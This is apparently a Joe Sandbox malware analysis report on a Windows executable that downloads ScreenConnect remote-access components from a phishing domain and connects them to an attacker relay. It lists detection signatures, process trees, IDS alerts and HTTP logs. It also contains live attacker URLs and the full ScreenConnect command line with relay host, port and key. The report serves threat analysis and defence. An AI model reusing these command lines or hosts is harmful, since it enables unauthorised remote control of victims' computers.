Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pzPO97QouM.exe

Overview

General Information

Sample name:pzPO97QouM.exe
renamed because original name is a hash value
Original sample name:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
Analysis ID:1551436
MD5:47891cf8a43a19e066fe70e812982c98
SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
Infos:

Detection

ScreenConnect Tool
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Antivirus detection for URL or domain
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • pzPO97QouM.exe (PID: 5856 cmdline: "C:\Users\user\Desktop\pzPO97QouM.exe" MD5: 47891CF8A43A19E066FE70E812982C98)
    • dfsvc.exe (PID: 7120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 4140 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 3652 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 1396 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4072 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 1372 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 2468 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2848 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 7120JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4140JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                5.0.ScreenConnect.WindowsClient.exe.dd0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7120, Protocol: tcp, SourceIp: 172.67.182.214, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2920, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T18:04:28.554147+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549715TCP
                  2024-11-07T18:05:06.383877+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549897TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T18:04:28.988102+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549717TCP
                  2024-11-07T18:04:30.684682+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549721TCP
                  2024-11-07T18:04:35.946315+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549742TCP
                  2024-11-07T18:04:37.828214+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549747TCP
                  2024-11-07T18:04:40.463486+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549757TCP
                  2024-11-07T18:04:42.302808+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549764TCP
                  2024-11-07T18:04:48.101543+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549795TCP
                  2024-11-07T18:04:50.623445+010020098971A Network Trojan was detected172.67.182.214443192.168.2.549808TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_l0899Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.manifestU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQHAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_34e089YAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Core.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Suppb/Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationanifestInformatiAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationz.Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationdb01RReJz3iq4Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationXAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application_Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicatioAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationosoftAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationsAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClientAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configFAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configUAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsCAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icuAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkgAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exetAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applications_e089Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationIEluYy4xQTA/BgNVAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConneAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Windows.dlldAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Windows.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientSeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exenAvira URL Cloud: Label: phishing
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.1% probability
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: pzPO97QouM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: pzPO97QouM.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 172.67.182.214:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: pzPO97QouM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500237000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.2458689321.000000000008D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500081000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462868370.0000000004AC2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F54A4B FindFirstFileExA,0_2_00F54A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\Jump to behavior

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry value created: NULL ServiceJump to behavior
                  Source: global trafficTCP traffic: 192.168.2.5:49848 -> 62.182.85.100:8880
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
